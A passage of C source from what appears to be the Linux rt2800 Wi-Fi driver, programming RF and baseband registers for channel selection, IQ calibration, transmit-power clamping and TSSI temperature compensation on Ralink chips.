rt2x00_set_field8(&rfcsr, RFCSR9_MOD, ((rf->rf3 - 8) & 0x4) >> 2);
rt2800_rfcsr_write(rt2x00dev, 9, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 11, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR11_R, rf->rf4 - 1);
rt2x00_set_field8(&rfcsr, RFCSR11_MOD, (rf->rf3 - 8) & 0x3);
rt2800_rfcsr_write(rt2x00dev, 11, rfcsr);
if (rf->channel <= 14) {
rt2800_rfcsr_write(rt2x00dev, 10, 0x90);
/* FIXME: RF11 owerwrite ? */
rt2800_rfcsr_write(rt2x00dev, 11, 0x4A);
rt2800_rfcsr_write(rt2x00dev, 12, 0x52);
rt2800_rfcsr_write(rt2x00dev, 13, 0x42);
rt2800_rfcsr_write(rt2x00dev, 22, 0x40);
rt2800_rfcsr_write(rt2x00dev, 24, 0x4A);
rt2800_rfcsr_write(rt2x00dev, 25, 0x80);
rt2800_rfcsr_write(rt2x00dev, 27, 0x42);
rt2800_rfcsr_write(rt2x00dev, 36, 0x80);
rt2800_rfcsr_write(rt2x00dev, 37, 0x08);
rt2800_rfcsr_write(rt2x00dev, 38, 0x89);
rt2800_rfcsr_write(rt2x00dev, 39, 0x1B);
rt2800_rfcsr_write(rt2x00dev, 40, 0x0D);
rt2800_rfcsr_write(rt2x00dev, 41, 0x9B);
rt2800_rfcsr_write(rt2x00dev, 42, 0xD5);
rt2800_rfcsr_write(rt2x00dev, 43, 0x72);
rt2800_rfcsr_write(rt2x00dev, 44, 0x0E);
rt2800_rfcsr_write(rt2x00dev, 45, 0xA2);
rt2800_rfcsr_write(rt2x00dev, 46, 0x6B);
rt2800_rfcsr_write(rt2x00dev, 48, 0x10);
rt2800_rfcsr_write(rt2x00dev, 51, 0x3E);
rt2800_rfcsr_write(rt2x00dev, 52, 0x48);
rt2800_rfcsr_write(rt2x00dev, 54, 0x38);
rt2800_rfcsr_write(rt2x00dev, 56, 0xA1);
rt2800_rfcsr_write(rt2x00dev, 57, 0x00);
rt2800_rfcsr_write(rt2x00dev, 58, 0x39);
rt2800_rfcsr_write(rt2x00dev, 60, 0x45);
rt2800_rfcsr_write(rt2x00dev, 61, 0x91);
rt2800_rfcsr_write(rt2x00dev, 62, 0x39);
/* TODO RF27 <- tssi */
rfcsr = rf->channel <= 10 ? 0x07 : 0x06;
rt2800_rfcsr_write(rt2x00dev, 23, rfcsr);
rt2800_rfcsr_write(rt2x00dev, 59, rfcsr);
if (is_11b) {
/* CCK */
rt2800_rfcsr_write(rt2x00dev, 31, 0xF8);
rt2800_rfcsr_write(rt2x00dev, 32, 0xC0);
if (is_type_ep)
rt2800_rfcsr_write(rt2x00dev, 55, 0x06);
else
rt2800_rfcsr_write(rt2x00dev, 55, 0x47);
} else {
/* OFDM */
if (is_type_ep)
rt2800_rfcsr_write(rt2x00dev, 55, 0x03);
else
rt2800_rfcsr_write(rt2x00dev, 55, 0x43);
}
power_bound = POWER_BOUND;
ep_reg = 0x2;
} else {
rt2800_rfcsr_write(rt2x00dev, 10, 0x97);
/* FIMXE: RF11 overwrite */
rt2800_rfcsr_write(rt2x00dev, 11, 0x40);
rt2800_rfcsr_write(rt2x00dev, 25, 0xBF);
rt2800_rfcsr_write(rt2x00dev, 27, 0x42);
rt2800_rfcsr_write(rt2x00dev, 36, 0x00);
rt2800_rfcsr_write(rt2x00dev, 37, 0x04);
rt2800_rfcsr_write(rt2x00dev, 38, 0x85);
rt2800_rfcsr_write(rt2x00dev, 40, 0x42);
rt2800_rfcsr_write(rt2x00dev, 41, 0xBB);
rt2800_rfcsr_write(rt2x00dev, 42, 0xD7);
rt2800_rfcsr_write(rt2x00dev, 45, 0x41);
rt2800_rfcsr_write(rt2x00dev, 48, 0x00);
rt2800_rfcsr_write(rt2x00dev, 57, 0x77);
rt2800_rfcsr_write(rt2x00dev, 60, 0x05);
rt2800_rfcsr_write(rt2x00dev, 61, 0x01);
/* TODO RF27 <- tssi */
if (rf->channel >= 36 && rf->channel <= 64) {
rt2800_rfcsr_write(rt2x00dev, 12, 0x2E);
rt2800_rfcsr_write(rt2x00dev, 13, 0x22);
rt2800_rfcsr_write(rt2x00dev, 22, 0x60);
rt2800_rfcsr_write(rt2x00dev, 23, 0x7F);
if (rf->channel <= 50)
rt2800_rfcsr_write(rt2x00dev, 24, 0x09);
else if (rf->channel >= 52)
rt2800_rfcsr_write(rt2x00dev, 24, 0x07);
rt2800_rfcsr_write(rt2x00dev, 39, 0x1C);
rt2800_rfcsr_write(rt2x00dev, 43, 0x5B);
rt2800_rfcsr_write(rt2x00dev, 44, 0X40);
rt2800_rfcsr_write(rt2x00dev, 46, 0X00);
rt2800_rfcsr_write(rt2x00dev, 51, 0xFE);
rt2800_rfcsr_write(rt2x00dev, 52, 0x0C);
rt2800_rfcsr_write(rt2x00dev, 54, 0xF8);
if (rf->channel <= 50) {
rt2800_rfcsr_write(rt2x00dev, 55, 0x06),
rt2800_rfcsr_write(rt2x00dev, 56, 0xD3);
} else if (rf->channel >= 52) {
rt2800_rfcsr_write(rt2x00dev, 55, 0x04);
rt2800_rfcsr_write(rt2x00dev, 56, 0xBB);
}
rt2800_rfcsr_write(rt2x00dev, 58, 0x15);
rt2800_rfcsr_write(rt2x00dev, 59, 0x7F);
rt2800_rfcsr_write(rt2x00dev, 62, 0x15);
} else if (rf->channel >= 100 && rf->channel <= 165) {
rt2800_rfcsr_write(rt2x00dev, 12, 0x0E);
rt2800_rfcsr_write(rt2x00dev, 13, 0x42);
rt2800_rfcsr_write(rt2x00dev, 22, 0x40);
if (rf->channel <= 153) {
rt2800_rfcsr_write(rt2x00dev, 23, 0x3C);
rt2800_rfcsr_write(rt2x00dev, 24, 0x06);
} else if (rf->channel >= 155) {
rt2800_rfcsr_write(rt2x00dev, 23, 0x38);
rt2800_rfcsr_write(rt2x00dev, 24, 0x05);
}
if (rf->channel <= 138) {
rt2800_rfcsr_write(rt2x00dev, 39, 0x1A);
rt2800_rfcsr_write(rt2x00dev, 43, 0x3B);
rt2800_rfcsr_write(rt2x00dev, 44, 0x20);
rt2800_rfcsr_write(rt2x00dev, 46, 0x18);
} else if (rf->channel >= 140) {
rt2800_rfcsr_write(rt2x00dev, 39, 0x18);
rt2800_rfcsr_write(rt2x00dev, 43, 0x1B);
rt2800_rfcsr_write(rt2x00dev, 44, 0x10);
rt2800_rfcsr_write(rt2x00dev, 46, 0X08);
}
if (rf->channel <= 124)
rt2800_rfcsr_write(rt2x00dev, 51, 0xFC);
else if (rf->channel >= 126)
rt2800_rfcsr_write(rt2x00dev, 51, 0xEC);
if (rf->channel <= 138)
rt2800_rfcsr_write(rt2x00dev, 52, 0x06);
else if (rf->channel >= 140)
rt2800_rfcsr_write(rt2x00dev, 52, 0x06);
rt2800_rfcsr_write(rt2x00dev, 54, 0xEB);
if (rf->channel <= 138)
rt2800_rfcsr_write(rt2x00dev, 55, 0x01);
else if (rf->channel >= 140)
rt2800_rfcsr_write(rt2x00dev, 55, 0x00);
if (rf->channel <= 128)
rt2800_rfcsr_write(rt2x00dev, 56, 0xBB);
else if (rf->channel >= 130)
rt2800_rfcsr_write(rt2x00dev, 56, 0xAB);
if (rf->channel <= 116)
rt2800_rfcsr_write(rt2x00dev, 58, 0x1D);
else if (rf->channel >= 118)
rt2800_rfcsr_write(rt2x00dev, 58, 0x15);
if (rf->channel <= 138)
rt2800_rfcsr_write(rt2x00dev, 59, 0x3F);
else if (rf->channel >= 140)
rt2800_rfcsr_write(rt2x00dev, 59, 0x7C);
if (rf->channel <= 116)
rt2800_rfcsr_write(rt2x00dev, 62, 0x1D);
else if (rf->channel >= 118)
rt2800_rfcsr_write(rt2x00dev, 62, 0x15);
}
power_bound = POWER_BOUND_5G;
ep_reg = 0x3;
}
rt2800_rfcsr_read(rt2x00dev, 49, &rfcsr);
if (info->default_power1 > power_bound)
rt2x00_set_field8(&rfcsr, RFCSR49_TX, power_bound);
else
rt2x00_set_field8(&rfcsr, RFCSR49_TX, info->default_power1);
if (is_type_ep)
rt2x00_set_field8(&rfcsr, RFCSR49_EP, ep_reg);
rt2800_rfcsr_write(rt2x00dev, 49, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 50, &rfcsr);
if (info->default_power2 > power_bound)
rt2x00_set_field8(&rfcsr, RFCSR50_TX, power_bound);
else
rt2x00_set_field8(&rfcsr, RFCSR50_TX, info->default_power2);
if (is_type_ep)
rt2x00_set_field8(&rfcsr, RFCSR50_EP, ep_reg);
rt2800_rfcsr_write(rt2x00dev, 50, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 1, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR1_RF_BLOCK_EN, 1);
rt2x00_set_field8(&rfcsr, RFCSR1_PLL_PD, 1);
rt2x00_set_field8(&rfcsr, RFCSR1_TX0_PD,
rt2x00dev->default_ant.tx_chain_num >= 1);
rt2x00_set_field8(&rfcsr, RFCSR1_TX1_PD,
rt2x00dev->default_ant.tx_chain_num == 2);
rt2x00_set_field8(&rfcsr, RFCSR1_TX2_PD, 0);
rt2x00_set_field8(&rfcsr, RFCSR1_RX0_PD,
rt2x00dev->default_ant.rx_chain_num >= 1);
rt2x00_set_field8(&rfcsr, RFCSR1_RX1_PD,
rt2x00dev->default_ant.rx_chain_num == 2);
rt2x00_set_field8(&rfcsr, RFCSR1_RX2_PD, 0);
rt2800_rfcsr_write(rt2x00dev, 1, rfcsr);
rt2800_rfcsr_write(rt2x00dev, 6, 0xe4);
if (conf_is_ht40(conf))
rt2800_rfcsr_write(rt2x00dev, 30, 0x16);
else
rt2800_rfcsr_write(rt2x00dev, 30, 0x10);
if (!is_11b) {
rt2800_rfcsr_write(rt2x00dev, 31, 0x80);
rt2800_rfcsr_write(rt2x00dev, 32, 0x80);
}
/* TODO proper frequency adjustment */
rt2800_adjust_freq_offset(rt2x00dev);
/* TODO merge with others */
rt2800_rfcsr_read(rt2x00dev, 3, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR3_VCOCAL_EN, 1);
rt2800_rfcsr_write(rt2x00dev, 3, rfcsr);
/* BBP settings */
rt2800_bbp_write(rt2x00dev, 62, 0x37 - rt2x00dev->lna_gain);
rt2800_bbp_write(rt2x00dev, 63, 0x37 - rt2x00dev->lna_gain);
rt2800_bbp_write(rt2x00dev, 64, 0x37 - rt2x00dev->lna_gain);
rt2800_bbp_write(rt2x00dev, 79, (rf->channel <= 14) ? 0x1C : 0x18);
rt2800_bbp_write(rt2x00dev, 80, (rf->channel <= 14) ? 0x0E : 0x08);
rt2800_bbp_write(rt2x00dev, 81, (rf->channel <= 14) ? 0x3A : 0x38);
rt2800_bbp_write(rt2x00dev, 82, (rf->channel <= 14) ? 0x62 : 0x92);
/* GLRT band configuration */
rt2800_bbp_write(rt2x00dev, 195, 128);
rt2800_bbp_write(rt2x00dev, 196, (rf->channel <= 14) ? 0xE0 : 0xF0);
rt2800_bbp_write(rt2x00dev, 195, 129);
rt2800_bbp_write(rt2x00dev, 196, (rf->channel <= 14) ? 0x1F : 0x1E);
rt2800_bbp_write(rt2x00dev, 195, 130);
rt2800_bbp_write(rt2x00dev, 196, (rf->channel <= 14) ? 0x38 : 0x28);
rt2800_bbp_write(rt2x00dev, 195, 131);
rt2800_bbp_write(rt2x00dev, 196, (rf->channel <= 14) ? 0x32 : 0x20);
rt2800_bbp_write(rt2x00dev, 195, 133);
rt2800_bbp_write(rt2x00dev, 196, (rf->channel <= 14) ? 0x28 : 0x7F);
rt2800_bbp_write(rt2x00dev, 195, 124);
rt2800_bbp_write(rt2x00dev, 196, (rf->channel <= 14) ? 0x19 : 0x7F);
}
static void rt2800_bbp_write_with_rx_chain(struct rt2x00_dev *rt2x00dev,
const unsigned int word,
const u8 value)
{
u8 chain, reg;
for (chain = 0; chain < rt2x00dev->default_ant.rx_chain_num; chain++) {
rt2800_bbp_read(rt2x00dev, 27, ®);
rt2x00_set_field8(®, BBP27_RX_CHAIN_SEL, chain);
rt2800_bbp_write(rt2x00dev, 27, reg);
rt2800_bbp_write(rt2x00dev, word, value);
}
}
static void rt2800_iq_calibrate(struct rt2x00_dev *rt2x00dev, int channel)
{
u8 cal;
/* TX0 IQ Gain */
rt2800_bbp_write(rt2x00dev, 158, 0x2c);
if (channel <= 14)
cal = rt2x00_eeprom_byte(rt2x00dev, EEPROM_IQ_GAIN_CAL_TX0_2G);
else if (channel >= 36 && channel <= 64)
cal = rt2x00_eeprom_byte(rt2x00dev,
EEPROM_IQ_GAIN_CAL_TX0_CH36_TO_CH64_5G);
else if (channel >= 100 && channel <= 138)
cal = rt2x00_eeprom_byte(rt2x00dev,
EEPROM_IQ_GAIN_CAL_TX0_CH100_TO_CH138_5G);
else if (channel >= 140 && channel <= 165)
cal = rt2x00_eeprom_byte(rt2x00dev,
EEPROM_IQ_GAIN_CAL_TX0_CH140_TO_CH165_5G);
else
cal = 0;
rt2800_bbp_write(rt2x00dev, 159, cal);
/* TX0 IQ Phase */
rt2800_bbp_write(rt2x00dev, 158, 0x2d);
if (channel <= 14)
cal = rt2x00_eeprom_byte(rt2x00dev, EEPROM_IQ_PHASE_CAL_TX0_2G);
else if (channel >= 36 && channel <= 64)
cal = rt2x00_eeprom_byte(rt2x00dev,
EEPROM_IQ_PHASE_CAL_TX0_CH36_TO_CH64_5G);
else if (channel >= 100 && channel <= 138)
cal = rt2x00_eeprom_byte(rt2x00dev,
EEPROM_IQ_PHASE_CAL_TX0_CH100_TO_CH138_5G);
else if (channel >= 140 && channel <= 165)
cal = rt2x00_eeprom_byte(rt2x00dev,
EEPROM_IQ_PHASE_CAL_TX0_CH140_TO_CH165_5G);
else
cal = 0;
rt2800_bbp_write(rt2x00dev, 159, cal);
/* TX1 IQ Gain */
rt2800_bbp_write(rt2x00dev, 158, 0x4a);
if (channel <= 14)
cal = rt2x00_eeprom_byte(rt2x00dev, EEPROM_IQ_GAIN_CAL_TX1_2G);
else if (channel >= 36 && channel <= 64)
cal = rt2x00_eeprom_byte(rt2x00dev,
EEPROM_IQ_GAIN_CAL_TX1_CH36_TO_CH64_5G);
else if (channel >= 100 && channel <= 138)
cal = rt2x00_eeprom_byte(rt2x00dev,
EEPROM_IQ_GAIN_CAL_TX1_CH100_TO_CH138_5G);
else if (channel >= 140 && channel <= 165)
cal = rt2x00_eeprom_byte(rt2x00dev,
EEPROM_IQ_GAIN_CAL_TX1_CH140_TO_CH165_5G);
else
cal = 0;
rt2800_bbp_write(rt2x00dev, 159, cal);
/* TX1 IQ Phase */
rt2800_bbp_write(rt2x00dev, 158, 0x4b);
if (channel <= 14)
cal = rt2x00_eeprom_byte(rt2x00dev, EEPROM_IQ_PHASE_CAL_TX1_2G);
else if (channel >= 36 && channel <= 64)
cal = rt2x00_eeprom_byte(rt2x00dev,
EEPROM_IQ_PHASE_CAL_TX1_CH36_TO_CH64_5G);
else if (channel >= 100 && channel <= 138)
cal = rt2x00_eeprom_byte(rt2x00dev,
EEPROM_IQ_PHASE_CAL_TX1_CH100_TO_CH138_5G);
else if (channel >= 140 && channel <= 165)
cal = rt2x00_eeprom_byte(rt2x00dev,
EEPROM_IQ_PHASE_CAL_TX1_CH140_TO_CH165_5G);
else
cal = 0;
rt2800_bbp_write(rt2x00dev, 159, cal);
/* FIXME: possible RX0, RX1 callibration ? */
/* RF IQ compensation control */
rt2800_bbp_write(rt2x00dev, 158, 0x04);
cal = rt2x00_eeprom_byte(rt2x00dev, EEPROM_RF_IQ_COMPENSATION_CONTROL);
rt2800_bbp_write(rt2x00dev, 159, cal != 0xff ? cal : 0);
/* RF IQ imbalance compensation control */
rt2800_bbp_write(rt2x00dev, 158, 0x03);
cal = rt2x00_eeprom_byte(rt2x00dev,
EEPROM_RF_IQ_IMBALANCE_COMPENSATION_CONTROL);
rt2800_bbp_write(rt2x00dev, 159, cal != 0xff ? cal : 0);
}
static char rt2800_txpower_to_dev(struct rt2x00_dev *rt2x00dev,
unsigned int channel,
char txpower)
{
if (rt2x00_rt(rt2x00dev, RT3593))
txpower = rt2x00_get_field8(txpower, EEPROM_TXPOWER_ALC);
if (channel <= 14)
return clamp_t(char, txpower, MIN_G_TXPOWER, MAX_G_TXPOWER);
if (rt2x00_rt(rt2x00dev, RT3593))
return clamp_t(char, txpower, MIN_A_TXPOWER_3593,
MAX_A_TXPOWER_3593);
else
return clamp_t(char, txpower, MIN_A_TXPOWER, MAX_A_TXPOWER);
}
static void rt2800_config_channel(struct rt2x00_dev *rt2x00dev,
struct ieee80211_conf *conf,
struct rf_channel *rf,
struct channel_info *info)
{
u32 reg;
unsigned int tx_pin;
u8 bbp, rfcsr;
info->default_power1 = rt2800_txpower_to_dev(rt2x00dev, rf->channel,
info->default_power1);
info->default_power2 = rt2800_txpower_to_dev(rt2x00dev, rf->channel,
info->default_power2);
if (rt2x00dev->default_ant.tx_chain_num > 2)
info->default_power3 =
rt2800_txpower_to_dev(rt2x00dev, rf->channel,
info->default_power3);
switch (rt2x00dev->chip.rf) {
case RF2020:
case RF3020:
case RF3021:
case RF3022:
case RF3320:
rt2800_config_channel_rf3xxx(rt2x00dev, conf, rf, info);
break;
case RF3052:
rt2800_config_channel_rf3052(rt2x00dev, conf, rf, info);
break;
case RF3053:
rt2800_config_channel_rf3053(rt2x00dev, conf, rf, info);
break;
case RF3290:
rt2800_config_channel_rf3290(rt2x00dev, conf, rf, info);
break;
case RF3322:
rt2800_config_channel_rf3322(rt2x00dev, conf, rf, info);
break;
case RF3070:
case RF5360:
case RF5362:
case RF5370:
case RF5372:
case RF5390:
case RF5392:
rt2800_config_channel_rf53xx(rt2x00dev, conf, rf, info);
break;
case RF5592:
rt2800_config_channel_rf55xx(rt2x00dev, conf, rf, info);
break;
default:
rt2800_config_channel_rf2xxx(rt2x00dev, conf, rf, info);
}
if (rt2x00_rf(rt2x00dev, RF3070) ||
rt2x00_rf(rt2x00dev, RF3290) ||
rt2x00_rf(rt2x00dev, RF3322) ||
rt2x00_rf(rt2x00dev, RF5360) ||
rt2x00_rf(rt2x00dev, RF5362) ||
rt2x00_rf(rt2x00dev, RF5370) ||
rt2x00_rf(rt2x00dev, RF5372) ||
rt2x00_rf(rt2x00dev, RF5390) ||
rt2x00_rf(rt2x00dev, RF5392)) {
rt2800_rfcsr_read(rt2x00dev, 30, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR30_TX_H20M, 0);
rt2x00_set_field8(&rfcsr, RFCSR30_RX_H20M, 0);
rt2800_rfcsr_write(rt2x00dev, 30, rfcsr);
rt2800_rfcsr_read(rt2x00dev, 3, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR3_VCOCAL_EN, 1);
rt2800_rfcsr_write(rt2x00dev, 3, rfcsr);
}
/*
* Change BBP settings
*/
if (rt2x00_rt(rt2x00dev, RT3352)) {
rt2800_bbp_write(rt2x00dev, 27, 0x0);
rt2800_bbp_write(rt2x00dev, 66, 0x26 + rt2x00dev->lna_gain);
rt2800_bbp_write(rt2x00dev, 27, 0x20);
rt2800_bbp_write(rt2x00dev, 66, 0x26 + rt2x00dev->lna_gain);
} else if (rt2x00_rt(rt2x00dev, RT3593)) {
if (rf->channel > 14) {
/* Disable CCK Packet detection on 5GHz */
rt2800_bbp_write(rt2x00dev, 70, 0x00);
} else {
rt2800_bbp_write(rt2x00dev, 70, 0x0a);
}
if (conf_is_ht40(conf))
rt2800_bbp_write(rt2x00dev, 105, 0x04);
else
rt2800_bbp_write(rt2x00dev, 105, 0x34);
rt2800_bbp_write(rt2x00dev, 62, 0x37 - rt2x00dev->lna_gain);
rt2800_bbp_write(rt2x00dev, 63, 0x37 - rt2x00dev->lna_gain);
rt2800_bbp_write(rt2x00dev, 64, 0x37 - rt2x00dev->lna_gain);
rt2800_bbp_write(rt2x00dev, 77, 0x98);
} else {
rt2800_bbp_write(rt2x00dev, 62, 0x37 - rt2x00dev->lna_gain);
rt2800_bbp_write(rt2x00dev, 63, 0x37 - rt2x00dev->lna_gain);
rt2800_bbp_write(rt2x00dev, 64, 0x37 - rt2x00dev->lna_gain);
rt2800_bbp_write(rt2x00dev, 86, 0);
}
if (rf->channel <= 14) {
if (!rt2x00_rt(rt2x00dev, RT5390) &&
!rt2x00_rt(rt2x00dev, RT5392)) {
if (rt2x00_has_cap_external_lna_bg(rt2x00dev)) {
rt2800_bbp_write(rt2x00dev, 82, 0x62);
rt2800_bbp_write(rt2x00dev, 75, 0x46);
} else {
if (rt2x00_rt(rt2x00dev, RT3593))
rt2800_bbp_write(rt2x00dev, 82, 0x62);
else
rt2800_bbp_write(rt2x00dev, 82, 0x84);
rt2800_bbp_write(rt2x00dev, 75, 0x50);
}
if (rt2x00_rt(rt2x00dev, RT3593))
rt2800_bbp_write(rt2x00dev, 83, 0x8a);
}
} else {
if (rt2x00_rt(rt2x00dev, RT3572))
rt2800_bbp_write(rt2x00dev, 82, 0x94);
else if (rt2x00_rt(rt2x00dev, RT3593))
rt2800_bbp_write(rt2x00dev, 82, 0x82);
else
rt2800_bbp_write(rt2x00dev, 82, 0xf2);
if (rt2x00_rt(rt2x00dev, RT3593))
rt2800_bbp_write(rt2x00dev, 83, 0x9a);
if (rt2x00_has_cap_external_lna_a(rt2x00dev))
rt2800_bbp_write(rt2x00dev, 75, 0x46);
else
rt2800_bbp_write(rt2x00dev, 75, 0x50);
}
rt2800_register_read(rt2x00dev, TX_BAND_CFG, ®);
rt2x00_set_field32(®, TX_BAND_CFG_HT40_MINUS, conf_is_ht40_minus(conf));
rt2x00_set_field32(®, TX_BAND_CFG_A, rf->channel > 14);
rt2x00_set_field32(®, TX_BAND_CFG_BG, rf->channel <= 14);
rt2800_register_write(rt2x00dev, TX_BAND_CFG, reg);
if (rt2x00_rt(rt2x00dev, RT3572))
rt2800_rfcsr_write(rt2x00dev, 8, 0);
tx_pin = 0;
switch (rt2x00dev->default_ant.tx_chain_num) {
case 3:
/* Turn on tertiary PAs */
rt2x00_set_field32(&tx_pin, TX_PIN_CFG_PA_PE_A2_EN,
rf->channel > 14);
rt2x00_set_field32(&tx_pin, TX_PIN_CFG_PA_PE_G2_EN,
rf->channel <= 14);
/* fall-through */
case 2:
/* Turn on secondary PAs */
rt2x00_set_field32(&tx_pin, TX_PIN_CFG_PA_PE_A1_EN,
rf->channel > 14);
rt2x00_set_field32(&tx_pin, TX_PIN_CFG_PA_PE_G1_EN,
rf->channel <= 14);
/* fall-through */
case 1:
/* Turn on primary PAs */
rt2x00_set_field32(&tx_pin, TX_PIN_CFG_PA_PE_A0_EN,
rf->channel > 14);
if (rt2x00_has_cap_bt_coexist(rt2x00dev))
rt2x00_set_field32(&tx_pin, TX_PIN_CFG_PA_PE_G0_EN, 1);
else
rt2x00_set_field32(&tx_pin, TX_PIN_CFG_PA_PE_G0_EN,
rf->channel <= 14);
break;
}
switch (rt2x00dev->default_ant.rx_chain_num) {
case 3:
/* Turn on tertiary LNAs */
rt2x00_set_field32(&tx_pin, TX_PIN_CFG_LNA_PE_A2_EN, 1);
rt2x00_set_field32(&tx_pin, TX_PIN_CFG_LNA_PE_G2_EN, 1);
/* fall-through */
case 2:
/* Turn on secondary LNAs */
rt2x00_set_field32(&tx_pin, TX_PIN_CFG_LNA_PE_A1_EN, 1);
rt2x00_set_field32(&tx_pin, TX_PIN_CFG_LNA_PE_G1_EN, 1);
/* fall-through */
case 1:
/* Turn on primary LNAs */
rt2x00_set_field32(&tx_pin, TX_PIN_CFG_LNA_PE_A0_EN, 1);
rt2x00_set_field32(&tx_pin, TX_PIN_CFG_LNA_PE_G0_EN, 1);
break;
}
rt2x00_set_field32(&tx_pin, TX_PIN_CFG_RFTR_EN, 1);
rt2x00_set_field32(&tx_pin, TX_PIN_CFG_TRSW_EN, 1);
rt2800_register_write(rt2x00dev, TX_PIN_CFG, tx_pin);
if (rt2x00_rt(rt2x00dev, RT3572)) {
rt2800_rfcsr_write(rt2x00dev, 8, 0x80);
/* AGC init */
if (rf->channel <= 14)
reg = 0x1c + (2 * rt2x00dev->lna_gain);
else
reg = 0x22 + ((rt2x00dev->lna_gain * 5) / 3);
rt2800_bbp_write_with_rx_chain(rt2x00dev, 66, reg);
}
if (rt2x00_rt(rt2x00dev, RT3593)) {
rt2800_register_read(rt2x00dev, GPIO_CTRL, ®);
/* Band selection */
if (rt2x00_is_usb(rt2x00dev) ||
rt2x00_is_pcie(rt2x00dev)) {
/* GPIO #8 controls all paths */
rt2x00_set_field32(®, GPIO_CTRL_DIR8, 0);
if (rf->channel <= 14)
rt2x00_set_field32(®, GPIO_CTRL_VAL8, 1);
else
rt2x00_set_field32(®, GPIO_CTRL_VAL8, 0);
}
/* LNA PE control. */
if (rt2x00_is_usb(rt2x00dev)) {
/* GPIO #4 controls PE0 and PE1,
* GPIO #7 controls PE2
*/
rt2x00_set_field32(®, GPIO_CTRL_DIR4, 0);
rt2x00_set_field32(®, GPIO_CTRL_DIR7, 0);
rt2x00_set_field32(®, GPIO_CTRL_VAL4, 1);
rt2x00_set_field32(®, GPIO_CTRL_VAL7, 1);
} else if (rt2x00_is_pcie(rt2x00dev)) {
/* GPIO #4 controls PE0, PE1 and PE2 */
rt2x00_set_field32(®, GPIO_CTRL_DIR4, 0);
rt2x00_set_field32(®, GPIO_CTRL_VAL4, 1);
}
rt2800_register_write(rt2x00dev, GPIO_CTRL, reg);
/* AGC init */
if (rf->channel <= 14)
reg = 0x1c + 2 * rt2x00dev->lna_gain;
else
reg = 0x22 + ((rt2x00dev->lna_gain * 5) / 3);
rt2800_bbp_write_with_rx_chain(rt2x00dev, 66, reg);
usleep_range(1000, 1500);
}
if (rt2x00_rt(rt2x00dev, RT5592)) {
rt2800_bbp_write(rt2x00dev, 195, 141);
rt2800_bbp_write(rt2x00dev, 196, conf_is_ht40(conf) ? 0x10 : 0x1a);
/* AGC init */
reg = (rf->channel <= 14 ? 0x1c : 0x24) + 2 * rt2x00dev->lna_gain;
rt2800_bbp_write_with_rx_chain(rt2x00dev, 66, reg);
rt2800_iq_calibrate(rt2x00dev, rf->channel);
}
rt2800_bbp_read(rt2x00dev, 4, &bbp);
rt2x00_set_field8(&bbp, BBP4_BANDWIDTH, 2 * conf_is_ht40(conf));
rt2800_bbp_write(rt2x00dev, 4, bbp);
rt2800_bbp_read(rt2x00dev, 3, &bbp);
rt2x00_set_field8(&bbp, BBP3_HT40_MINUS, conf_is_ht40_minus(conf));
rt2800_bbp_write(rt2x00dev, 3, bbp);
if (rt2x00_rt_rev(rt2x00dev, RT2860, REV_RT2860C)) {
if (conf_is_ht40(conf)) {
rt2800_bbp_write(rt2x00dev, 69, 0x1a);
rt2800_bbp_write(rt2x00dev, 70, 0x0a);
rt2800_bbp_write(rt2x00dev, 73, 0x16);
} else {
rt2800_bbp_write(rt2x00dev, 69, 0x16);
rt2800_bbp_write(rt2x00dev, 70, 0x08);
rt2800_bbp_write(rt2x00dev, 73, 0x11);
}
}
msleep(1);
/*
* Clear channel statistic counters
*/
rt2800_register_read(rt2x00dev, CH_IDLE_STA, ®);
rt2800_register_read(rt2x00dev, CH_BUSY_STA, ®);
rt2800_register_read(rt2x00dev, CH_BUSY_STA_SEC, ®);
/*
* Clear update flag
*/
if (rt2x00_rt(rt2x00dev, RT3352)) {
rt2800_bbp_read(rt2x00dev, 49, &bbp);
rt2x00_set_field8(&bbp, BBP49_UPDATE_FLAG, 0);
rt2800_bbp_write(rt2x00dev, 49, bbp);
}
}
static int rt2800_get_gain_calibration_delta(struct rt2x00_dev *rt2x00dev)
{
u8 tssi_bounds[9];
u8 current_tssi;
u16 eeprom;
u8 step;
int i;
/*
* First check if temperature compensation is supported.
*/
rt2800_eeprom_read(rt2x00dev, EEPROM_NIC_CONF1, &eeprom);
if (!rt2x00_get_field16(eeprom, EEPROM_NIC_CONF1_EXTERNAL_TX_ALC))
return 0;
/*
* Read TSSI boundaries for temperature compensation from
* the EEPROM.
*
* Array idx 0 1 2 3 4 5 6 7 8
* Matching Delta value -4 -3 -2 -1 0 +1 +2 +3 +4
* Example TSSI bounds 0xF0 0xD0 0xB5 0xA0 0x88 0x45 0x25 0x15 0x00
*/
if (rt2x00dev->curr_band == IEEE80211_BAND_2GHZ) {
rt2800_eeprom_read(rt2x00dev, EEPROM_TSSI_BOUND_BG1, &eeprom);
tssi_bounds[0] = rt2x00_get_field16(eeprom,
EEPROM_TSSI_BOUND_BG1_MINUS4);
tssi_bounds[1] = rt2x00_get_field16(eeprom,
EEPROM_TSSI_BOUND_BG1_MINUS3);
rt2800_eeprom_read(rt2x00dev, EEPROM_TSSI_BOUND_BG2, &eeprom);
tssi_bounds[2] = rt2x00_get_field16(eeprom,
EEPROM_TSSI_BOUND_BG2_MINUS2);
tssi_bounds[3] = rt2x00_get_field16(eeprom,
EEPROM_TSSI_BOUND_BG2_MINUS1);
rt2800_eeprom_read(rt2x00dev, EEPROM_TSSI_BOUND_BG3, &eeprom);
tssi_bounds[4] = rt2x00_get_field16(eeprom,
EEPROM_TSSI_BOUND_BG3_REF);
tssi_bounds[5] = rt2x00_get_field16(eeprom,
EEPROM_TSSI_BOUND_BG3_PLUS1);
rt2800_eeprom_read(rt2x00dev, EEPROM_TSSI_BOUND_BG4, &eeprom);
tssi_bounds[6] = rt2x00_get_field16(eeprom,
EEPROM_TSSI_BOUND_BG4_PLUS2);
tssi_bounds[7] = rt2x00_get_field16(eeprom,
EEPROM_TSSI_BOUND_BG4_PLUS3);
rt2800_eeprom_read(rt2x00dev, EEPROM_TSSI_BOUND_BG5, &eeprom);
tssi_bounds[8] = rt2x00_get_field16(eeprom,
EEPROM_TSSI_BOUND_BG5_PLUS4);
step = rt2x00_get_field16(eeprom,
EEPROM_TSSI_BOUND_BG5_AGC_STEP);
